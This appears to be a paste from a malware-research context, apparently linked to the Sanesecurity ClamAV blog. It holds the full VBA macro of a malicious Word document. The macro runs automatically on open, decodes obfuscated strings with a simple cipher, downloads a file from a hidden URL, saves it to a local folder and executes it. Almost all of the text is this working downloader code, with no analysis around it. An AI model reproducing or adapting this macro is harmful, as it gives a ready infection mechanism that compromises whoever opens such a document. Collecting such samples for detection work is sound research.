CIRCOR decoded 2

1. http://sanesecurity.blogspot.co.uk/
2. Sanesecurity ClamAV blog: zero hour malware, phishing and scams
3. A hopefully interesting blog from the world of zero hour malware, phishing, scams and spams
4.  
5. Attribute VB_Name = "ThisDocument"
6. Attribute VB_Base = "1Normal.ThisDocument"
7. Attribute VB_GlobalNameSpace = False
8. Attribute VB_Creatable = False
9. Attribute VB_PredeclaredId = True
10. Attribute VB_Exposed = True
11. Attribute VB_TemplateDerived = True
12. Attribute VB_Customizable = True
13. Private Const tocFp6Ci = "RHmhiglW"
14. Private Const lu0ADI = "“Œ¼¬«•¿ËºÒÉÖ"
15. Private Const FXC0O = "FcXBDjpJ"
16. Private Const OfmF = "´Ò…¥¥ÍدÅ··Þ¸ÈΣ°Óԧ׽"
17. Private Const iD2E0Ifr = "isuHYmuy"
18. Private Const YaoZ6ISB = "ÌÔØ°¾šØèáéºÈÙ"
19. Private Const vymArH = "DVuVgasc"
20. Private Const wPWCLsRmA = "‹›É"
21. Private Const V8aAdPb = "IIirEgAf"
22. Private Const TYRE = "–²Ìä´Ú°Ì½—Ê’³‰¹"
23. Private Const SORyht2aNVn = "WqTYmiRe"
24. Private Const Z5AlucBiW = "³ÕÇ¿à͸“Ö̾"
25. Private Const HFfeUiZo = "bdVuKCmU"
26. Private Const gvFktaB = "¶©£Å"
27. Private Const seq = "fDJRuIHX"
28. Private Const EVsZjgGped = "¹¬¯¾áw‰È´¶»Øª¼Ï³¸"
29. Private Const dgL8Y5 = "jpwmSbca"
30. Private Const iRqo = "ÆÔêÓÆÆɏÕïÒ"
31. Private Const Oat7OoU5O = "oclJEhjQ"
32. Private Const CDQluD = "蹚"
33. Private Const GuXH1 = "sPnfbnET"
34. Private Const h3OXMLBCsI = "ÛÄâÖœt»¼ÝՐܬ¢ºá•Ä׳¡µæË"
35.  
36. Sub s5AHNe()
37. PtBTpJ
38. End Sub
39. Sub WGRW()
40. s5AHNe
41. End Sub
42. Sub autoopen()
43. s5AHNe
44. End Sub
45. Public Sub PtBTpJ()
46. On Error GoTo errHere
47.  
48. Dim hk5tg As String
49.  
50. Dim ghjrtg As String
51. Dim ktyreg As String
52.  
53. ghjrtg = PwlVK1OLyI(h3OXMLBCsI, GuXH1)
54. ktyreg = Environ(PwlVK1OLyI(CDQluD, Oat7OoU5O)) & PwlVK1OLyI(iRqo, dgL8Y5)
55.  
56. If PfnG(ghjrtg, ktyreg) = False Then
57.  
58. GoTo ExitHere
59. End If
60. Set yjukj5wef = CreateObject(PwlVK1OLyI(EVsZjgGped, seq))
61. yjukj5wef.Open Environ(PwlVK1OLyI(gvFktaB, HFfeUiZo)) & PwlVK1OLyI(Z5AlucBiW, SORyht2aNVn)
62.  
63. ExitHere:
64. Exit Sub
65. errHere:
66.  
67. Resume ExitHere
68.  
69. End Sub
70.  
71. Public Function PfnG(strTarget As String, fdgert3r As String, Optional strUN As String, Optional strPW As String) As Boolean
72. On Error GoTo errHere
73.  
74. Dim dsfrt34t43g As Object
75. Dim yukjh4 As String
76. PfnG = True
77. Set dsfrt34t43g = CreateObject(PwlVK1OLyI(TYRE, V8aAdPb))
78. With dsfrt34t43g
79. .Open PwlVK1OLyI(wPWCLsRmA, vymArH), strTarget, False, strUN, strPW
80. .setRequestHeader PwlVK1OLyI(YaoZ6ISB, iD2E0Ifr), PwlVK1OLyI(OfmF, FXC0O)
81. .Send
82. If lqj4OnON(fdgert3r, .responseBody) = False Then
83. GoTo errHere
84. End If
85. End With
86.  
87. ExitHere:
88. Set dsfrt34t43g = Nothing
89. Exit Function
90.  
91. errHere:
92. PfnG = False
93. Resume ExitHere
94.  
95. End Function
96.  
97. Private Function lqj4OnON(strFilePath, bytArray) As Boolean
98. On Error GoTo errHere
99.  
100.  
101. Dim objStream As Object
102. lqj4OnON = True
103. Set objStream = CreateObject(PwlVK1OLyI(lu0ADI, tocFp6Ci))
104. With objStream
105. .Type = 1
106. .Open
107. .Write bytArray
108. .SaveToFile strFilePath, 2
109. End With
110.  
111. ExitHere:
112. Exit Function
113. errHere:
114. lqj4OnON = False
115. Resume ExitHere
116.  
117. End Function
118.  
119.  
120.  
121. Public Function PwlVK1OLyI(ByVal strData As String, ByVal strKey As String)
122.  
123. Dim bData() As Byte
124. Dim bKey() As Byte
125. bData = StrConv(strData, vbFromUnicode)
126. bKey = StrConv(strKey, vbFromUnicode)
127. For i = 0 To UBound(bData)
128. If i <= UBound(bKey) Then
129. bData(i) = bData(i) - bKey(i)
130. Else
131. bData(i) = bData(i) - bKey(i Mod UBound(bKey))
132. End If
133. Next i
134. PwlVK1OLyI = StrConv(bData, vbUnicode)
135. End Function